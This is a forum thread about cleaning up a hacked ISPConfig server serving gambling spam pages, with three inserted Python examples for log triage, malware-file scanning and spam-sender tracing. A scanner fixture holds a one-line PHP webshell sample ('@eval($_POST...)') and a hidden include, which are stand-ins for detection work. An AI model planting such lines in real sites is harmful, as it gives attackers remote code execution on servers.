Glücksspiel (gambling) hacker

Discussion in 'ISPConfig 3 Priority Support' started by stst, Jan 9, 2025 at 5:53 PM.

  1. stst

    stst Member HowtoForge Supporter

    I currently have a lot of requests in the Apache access log with GET /gl%C3%BCcksspiel-salzburg/ or similar folders. The links work, but I cannot determine where they are coming from. I found these links in multiple domains on the server. ISPP_scan found some suspicious files, but not in all affected domains.

    Can you please tell me how to get rid of that and prevent similar attacks in the future?
     
  2. remkoh

    remkoh Active Member HowtoForge Supporter

    Probably a hacked (most likely wordpress) website on your server.
    Is there no referer in the logs?
     
  3. stst

    stst Member HowtoForge Supporter

    This is what it shows:
    Code:
    40.77.167.65 - - [10/Jan/2025:05:39:48 +0000] "GET /freispiele-bei-registrierung-2024/ HTTP/1.1" 200 16546 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
    40.77.167.58 - - [10/Jan/2025:05:40:45 +0000] "GET /spielothek-tauberbischofsheim/ HTTP/1.1" 200 13901 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
    40.77.167.71 - - [10/Jan/2025:05:42:47 +0000] "GET /spielgeld-slots/ HTTP/1.1" 200 16644 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
    52.167.144.186 - - [10/Jan/2025:05:43:59 +0000] "GET /kartenspiele-f%C3%BCr-2-32-karten/ HTTP/1.1" 200 16605 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
    40.77.167.71 - - [10/Jan/2025:05:48:29 +0000] "GET /bingo-spiel-anleitung/ HTTP/1.1" 200 16580 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
    40.77.167.58 - - [10/Jan/2025:05:48:36 +0000] "GET /casino-welches-speile-hat-die-meisten-freispiel/ HTTP/1.1" 200 16511 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
    40.77.167.44 - - [10/Jan/2025:05:49:30 +0000] "GET /online-gl%C3%BCcksspiel-deutschland/ HTTP/1.1" 200 16575 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
    
    Do you mean bing.com/bingbot as the referer?
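The log lines above are the usual signature of injected SEO-spam pages: paths the site owner never created, answered with 200, fetched by a crawler with an empty referer. As an added example (not code from the thread), the script below parses Apache combined-format lines, percent-decodes the path, keyword-matches it against the German gambling terms seen in the post, and reports which of those pages the site actually served with 200. The seven spam lines are the ones posted above; the two Firefox lines and the keyword list are constructed assumptions and should be tuned per site.

```python
"""Added example (not from the thread): flag injected SEO-spam pages in an Apache
combined-format access log.  The seven bingbot lines are the ones posted in the
thread; the two 203.0.113.7 lines are constructed benign requests for contrast."""
import re
from collections import Counter
from urllib.parse import unquote

# Apache "combined" LogFormat: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: [^"]*)?" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Gambling terms taken from the posted paths; assumption: extend this per site.
SPAM_WORDS = ("glücksspiel", "gluecksspiel", "casino", "spielothek", "freispiel",
              "slots", "bingo", "kartenspiel", "spielgeld")
CRAWLER_RE = re.compile(r"bingbot|googlebot|yandexbot|duckduckbot", re.IGNORECASE)


def parse_line(line):
    """Return the log fields as a dict, or None if the line is not combined format."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def is_spam_path(path):
    """Percent-decode the request path (gl%C3%BCcksspiel -> glücksspiel) and keyword-match it."""
    decoded = unquote(path).lower()
    return any(word in decoded for word in SPAM_WORDS)


def triage(lines):
    """Return the hits: spam-looking paths that the site answered with 200.

    A 200 for a page the owner never created is the tell: the content exists
    somewhere (rewrite rule, dropped PHP, database rows), and an empty referer
    plus a crawler UA means search engines are already indexing it.
    """
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["status"] != "200" or not is_spam_path(rec["path"]):
            continue
        rec["crawler"] = bool(CRAWLER_RE.search(rec["ua"]))
        rec["decoded_path"] = unquote(rec["path"])
        hits.append(rec)
    return hits


def summarize(hits):
    """Per-path request counts plus how many hits came from crawlers."""
    return {
        "paths": Counter(h["decoded_path"] for h in hits),
        "crawler_hits": sum(1 for h in hits if h["crawler"]),
        "total": len(hits),
    }


SAMPLE_LOG = """\
40.77.167.65 - - [10/Jan/2025:05:39:48 +0000] "GET /freispiele-bei-registrierung-2024/ HTTP/1.1" 200 16546 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.58 - - [10/Jan/2025:05:40:45 +0000] "GET /spielothek-tauberbischofsheim/ HTTP/1.1" 200 13901 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.71 - - [10/Jan/2025:05:42:47 +0000] "GET /spielgeld-slots/ HTTP/1.1" 200 16644 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
52.167.144.186 - - [10/Jan/2025:05:43:59 +0000] "GET /kartenspiele-f%C3%BCr-2-32-karten/ HTTP/1.1" 200 16605 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.71 - - [10/Jan/2025:05:48:29 +0000] "GET /bingo-spiel-anleitung/ HTTP/1.1" 200 16580 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.58 - - [10/Jan/2025:05:48:36 +0000] "GET /casino-welches-speile-hat-die-meisten-freispiel/ HTTP/1.1" 200 16511 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.44 - - [10/Jan/2025:05:49:30 +0000] "GET /online-gl%C3%BCcksspiel-deutschland/ HTTP/1.1" 200 16575 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
203.0.113.7 - - [10/Jan/2025:05:50:02 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/134.0"
203.0.113.7 - - [10/Jan/2025:05:50:09 +0000] "GET /wp-login.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/134.0"
""".splitlines()

if __name__ == "__main__":
    found = triage(SAMPLE_LOG)
    for h in found:
        print(f'{h["ip"]:16} {h["status"]} {"crawler" if h["crawler"] else "other  "} {h["decoded_path"]}')
    print(summarize(found))
```

On an ISPConfig host, run this over each site's own log (the per-site access.log under the web directory) rather than the global Apache log, so each hit is already attributed to a site ID; a site with 200s for these paths is compromised whether or not a malware scanner flagged a file there.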
     
  4. stst

    stst Member HowtoForge Supporter

    Can anyone help me with that?
     
  5. remkoh

    remkoh Active Member HowtoForge Supporter

    No that's just a crawler that has found it and now is indexing it.

    Which file is the logging from? General Apache or Nginx log?

    As you've posted in an ISPC topic, I'm assuming your server is running ISPC to manage your websites.
    Then all websites should have their own log files, and you would thereby know which site is troubling you.
    So if the logging is from the general webserver log, then there seems to be something fundamentally wrong with your server installation.
     
  6. stst

    stst Member HowtoForge Supporter

    Yes, it's ISPC and it's running on Apache. As I said, multiple sites are affected, and ISPP_scan did not detect suspicious files in all of them. This is just a sequence from one customer's log file, but I can find the same thing in other customers' logs as well.
     
  7. remkoh

    remkoh Active Member HowtoForge Supporter

    Well, then you know which sites are compromised.
    Clean those up and keep their CMS software updated in the future.

    Other than that, there's no real way to prevent it.
    Hackers exploit security leaks and can only do that if the website owner isn't updating/patching his or her software.
    I've seen it with WordPress websites especially, way more times than I would like.
    Though WordPress has some good plugins, like Wordfence, that can help a bit.
     
  8. till

    till Super Moderator Staff Member ISPConfig Developer

    Like @remkoh mentioned, check the sites for suspicious files; you could, e.g., search for recently changed files. Also, the issue can be in the database content at times. While ISPProtect finds most malware, there is no 100% guarantee, as with any antivirus software, that no malware slips through.
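The two checks recommended in this thread, recently changed files (above) and the web user's crontab (till's later post), as an added example that is not the thread's or ISPConfig's own code. It assumes the ISPConfig layout in which site N runs as user webN and its files live under /var/www/clients/clientX/webN; build_sample_tree() creates a constructed temporary web root so the example runs offline, and the file contents in it are made-up stand-ins for a dropped PHP file.

```python
"""Added example (not from the thread): cleanup checks for a hacked site on an
ISPConfig host: recently changed files, PHP where only static content belongs,
and the web user's crontab.  build_sample_tree() is a constructed web root."""
import os
import subprocess
import tempfile
import time

# Directories that should hold static content only; PHP there is a classic drop spot.
STATIC_ONLY_DIRS = ("wp-content/uploads", "wp-content/cache", "cache", "tmp")


def recently_modified(root, days=14, now=None, use_ctime=False):
    """Files under root changed within `days`, newest first, as (path, timestamp).

    Caveat: an attacker can reset mtime (touch -r on a neighbouring file), but
    st_ctime is set by the kernel and cannot be forged without root, so do a
    second pass with use_ctime=True when the mtime pass looks too clean.
    """
    now = time.time() if now is None else now
    cutoff = now - days * 86400
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            stamp = st.st_ctime if use_ctime else st.st_mtime
            if stamp >= cutoff:
                found.append((path, stamp))
    found.sort(key=lambda item: item[1], reverse=True)
    return found


def suspicious_files(root, paths):
    """Subset of paths that look like dropped code: PHP in static-only dirs,
    hidden .php files, or a non-PHP extension whose content starts with <?php."""
    flagged = []
    for path in paths:
        rel = os.path.relpath(path, root).replace(os.sep, "/")
        name = os.path.basename(path)
        is_php = name.lower().endswith((".php", ".phtml", ".php7"))
        if is_php:
            if name.startswith(".") or any(rel.startswith(d + "/") for d in STATIC_ONLY_DIRS):
                flagged.append(path)
            continue
        try:
            with open(path, "rb") as fh:
                head = fh.read(64).lstrip()
        except OSError:
            continue
        if head.startswith(b"<?php") or head.startswith(b"<?="):
            flagged.append(path)
    return flagged


def web_user_crontab(site_id):
    """Lines of `crontab -l -u web<ID>` (ISPConfig's site user), [] if none or not root."""
    try:
        proc = subprocess.run(["crontab", "-l", "-u", f"web{site_id}"],
                              capture_output=True, text=True)
    except OSError:            # no crontab binary on this machine
        return []
    if proc.returncode != 0:   # "no crontab for webN" or permission denied
        return []
    return [l for l in proc.stdout.splitlines() if l.strip() and not l.lstrip().startswith("#")]


def build_sample_tree():
    """Constructed web root: an old theme file, a fresh legit index.php, a fresh
    PHP file dropped into uploads and a fresh .ico that is really PHP."""
    root = tempfile.mkdtemp(prefix="web10_")
    files = {  # relative path: (content, age in days); all contents are made up
        "wp-content/themes/t/functions.php": (b"<?php // theme code\n", 90),
        "index.php": (b"<?php require 'wp-blog-header.php';\n", 1),
        "wp-content/uploads/2025/01/wp-class.php": (b"<?php @eval($_POST['c']);\n", 1),
        "wp-content/uploads/favicon.ico": (b"<?php @include '/tmp/.c';\n", 2),
    }
    now = time.time()
    for rel, (content, age_days) in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(content)
        os.utime(path, (now - age_days * 86400, now - age_days * 86400))
    return root


def run_checks(root=None, days=14):
    """Recent files and the suspicious subset for root (the sample tree if None)."""
    root = build_sample_tree() if root is None else root
    recent = [p for p, _ in recently_modified(root, days=days)]
    return {"root": root, "recent": recent, "flagged": suspicious_files(root, recent)}


if __name__ == "__main__":
    result = run_checks()
    print("recent:", *result["recent"], sep="\n  ")
    print("flagged:", *result["flagged"], sep="\n  ")
    print("crontab web10:", web_user_crontab(10))
```

Run it as root against /var/www/clients/clientX/webN/web with the site's ID; a cron entry for the web user that you did not create, or a PHP file under uploads, is the reinfection path to remove before restoring from a clean CMS copy.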
     
  9. stst

    stst Member HowtoForge Supporter

    Unfortunately, the server has now been blacklisted by several blocklists, so many customers are not able to send mails anymore.
    Does anyone have experience with getting a server clean and getting it removed from blacklists?
    • How do I find which spam mails were sent by which user?
    • Is there a way to allow SMTP traffic only from specific countries?
    • What else can I do to fix that?
    Thanks in advance!
     
  10. till

    till Super Moderator Staff Member ISPConfig Developer

    https://www.faqforge.com/linux/how-to-find-out-who-sent-a-email-in-postfix-mailqueue/

    I doubt that your problem is SMTP traffic from other countries. If websites get hacked, the SMTP traffic originates from your server; there is no incoming SMTP traffic from other countries.

    You must clean the hacked websites. As already mentioned, you can use ISPProtect to find malware, as you did already. If you run WordPress, then installing Wordfence is a good option to secure the site and prevent it from getting infected again, and you can use it to scan your sites for malware further. Also, check that you do not have cronjobs for the web user that reinject malware into the sites. E.g. if the website has ID 10, then check with:

    crontab -l -u web10

    If you can't get it cleaned up yourself, consider contacting Thom from ISPConfig business support team at AmsterdamTech and ask if he can do that for you:

    https://www.ispconfig.org/get-support/?type=ispconfig
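For the "which user sent the spam" question, an added example that is neither the thread's nor the linked article's own steps: `postqueue -p` (the same output as `mailq`) lists queue ID, size, arrival time and envelope sender, but the envelope sender is whatever the script chose. Mail handed to Postfix through sendmail(1), which is what PHP's mail() does, gets a "Received: by host (Postfix, from userid N)" header that the script cannot forge, and with PHP's mail.add_x_header enabled an X-PHP-Originating-Script header naming the script. `postcat -q <ID>` prints the queued message so both can be read. Both sample outputs below are constructed; the uid 5010 and the script name are assumptions.

```python
"""Added example (not from the thread): attribute queued mail to the local
user that injected it, from `postqueue -p` and `postcat -q <ID>` output.
SAMPLE_QUEUE and SAMPLE_POSTCAT are constructed; uid 5010 is an assumption."""
import pwd
import re
import subprocess
from collections import defaultdict

QUEUE_HDR = re.compile(
    r"^(?P<qid>[0-9A-Za-z]+)(?P<flag>[*!]?)\s+(?P<size>\d+)\s+"
    r"(?P<arrival>\w{3} \w{3} +\d+ [\d:]+)\s+(?P<sender>\S+)$")
RECIPIENT = re.compile(r"^\s+(?P<rcpt>\S+@\S+)$")
USERID = re.compile(r"\(Postfix, from userid (?P<uid>\d+)\)")
PHP_SCRIPT = re.compile(r"^X-PHP-Originating-Script:\s*(?P<uid>\d+):(?P<script>\S+)", re.M)


def parse_postqueue(text):
    """Parse `postqueue -p` output into [{qid, flag, size, arrival, sender, recipients}].
    flag is '*' for active, '!' for hold, '' for deferred."""
    entries, cur = [], None
    for line in text.splitlines():
        m = QUEUE_HDR.match(line)
        if m:
            cur = {"qid": m["qid"], "flag": m["flag"], "size": int(m["size"]),
                   "arrival": m["arrival"], "sender": m["sender"], "recipients": []}
            entries.append(cur)
            continue
        if cur is None:
            continue
        r = RECIPIENT.match(line)
        if r:
            cur["recipients"].append(r["rcpt"])
        elif not line.strip():
            cur = None          # blank line closes a queue entry
        # a line starting with "(" is the deferral reason; nothing to extract
    return entries


def by_sender(entries):
    """Messages and recipients per envelope sender.  The sender is script-chosen
    and may be forged; use origin_from_postcat for the real local user."""
    stats = defaultdict(lambda: {"messages": 0, "recipients": 0})
    for e in entries:
        stats[e["sender"]]["messages"] += 1
        stats[e["sender"]]["recipients"] += len(e["recipients"])
    return dict(stats)


def origin_from_postcat(text):
    """uid that handed the message to Postfix, plus the PHP script if the
    X-PHP-Originating-Script header is present (needs mail.add_x_header=On)."""
    m = USERID.search(text)
    s = PHP_SCRIPT.search(text)
    return {"uid": int(m["uid"]) if m else None, "script": s["script"] if s else None}


def uid_to_user(uid):
    """Map the uid to a login name (webN on ISPConfig); None if unknown here."""
    try:
        return pwd.getpwuid(uid).pw_name
    except KeyError:
        return None


def origin_of_queue_id(qid):
    """Live variant: run postcat -q on the local queue (not used offline)."""
    proc = subprocess.run(["postcat", "-q", qid], capture_output=True, text=True)
    return origin_from_postcat(proc.stdout) if proc.returncode == 0 else None


SAMPLE_QUEUE = """\
-Queue ID-  --Size-- ----Arrival Time---- -Sender/Recipient-------
4A1B2C3D4E*     2345 Fri Jan 10 05:39:48  newsletter@customer-one.example
                                         victim1@example.net
                                         victim2@example.org
                                         victim3@example.com

5F6A7B8C9D      2101 Fri Jan 10 05:40:12  newsletter@customer-one.example
(connect to mx.example.net[198.51.100.9]:25: Connection timed out)
                                         victim4@example.net

6B7C8D9E0F      1587 Fri Jan 10 05:41:03  info@customer-two.example
                                         partner@example.org

-- 6 Kbytes in 3 Requests.
"""

SAMPLE_POSTCAT = """\
*** ENVELOPE RECORDS deferred/4/4A1B2C3D4E ***
sender: newsletter@customer-one.example
*** MESSAGE CONTENTS deferred/4/4A1B2C3D4E ***
Received: by srv1.example (Postfix, from userid 5010)
\tid 4A1B2C3D4E; Fri, 10 Jan 2025 05:39:48 +0000 (UTC)
X-PHP-Originating-Script: 5010:wp-class.php
To: victim1@example.net
Subject: Freispiele bei Registrierung
"""

if __name__ == "__main__":
    for sender, st in by_sender(parse_postqueue(SAMPLE_QUEUE)).items():
        print(f'{sender:40} {st["messages"]} msgs {st["recipients"]} rcpts')
    origin = origin_from_postcat(SAMPLE_POSTCAT)
    print("injected by uid", origin["uid"], uid_to_user(origin["uid"]), "script", origin["script"])
```

Once the uid is known, the matching webN user points at the site to clean; after that, `postsuper -d ALL deferred` flushes the spam still waiting in the queue, and delisting requests to the blocklists only make sense once no new spam leaves the host.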
     
  11. stst

    stst Member HowtoForge Supporter

    Hi till,

    Thanks, especially for the crontab hint. I found an entry there, but when I try to change it using crontab -e -u web.. (as root), nano tells me that the file was converted from DOS format and I'm not able to save the changed file. How can I change it?
     
  12. stst

    stst Member HowtoForge Supporter

    Found it... Alt+D did the job...
     
